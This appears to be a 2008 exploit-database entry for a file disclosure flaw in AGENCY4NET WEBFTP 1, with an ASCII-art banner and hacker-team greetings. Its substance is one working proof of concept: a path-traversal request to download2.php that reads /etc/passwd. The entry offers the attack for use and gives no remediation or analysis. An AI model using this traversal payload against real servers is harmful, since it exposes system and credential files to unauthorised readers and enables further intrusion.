id: 2435
date: 01/01/2008
title: AGENCY4NET WEBFTP 1 download2.php File Disclosure Vulnerability
author: GoLd_M
cves: 

===============================================================
AGENCY4NET WEBFTP 1 download2.php File Disclosure Vulnerability
===============================================================



    ########                  ######              ####                ######  ######
  ##      ##                    ##                  ##                  ####  ####  
  ##              ######        ##            ####  ##                  ####  ####  
  ##            ##      ##      ##          ##    ####                  ##  ##  ##  
  ##    ######  ##      ##      ##    ##    ##      ##                  ##      ##  
  ##      ##    ##      ##      ##    ##    ##      ##                  ##      ##  
    ######        ######      ##########      ##########              ######  ######
                                                        ##############              

####################################################################################
###### AGENCY4NET WEBFTP 1 download2.php Remote File Disclosure Vulnerability  #####
###### POC :                                                                   #####
###### /Script/download2.php?file=../../../../../../../../../../../etc/passwd  #####
###### D0rk :  :(                                                              #####
###### TrYaG-TeaM [Tryag.com/cc], H-T Team , RoMaNcYxHaCkEr , Asb-May's Team   #####
####################################################################################



#  0day.today [2023-03-26]  #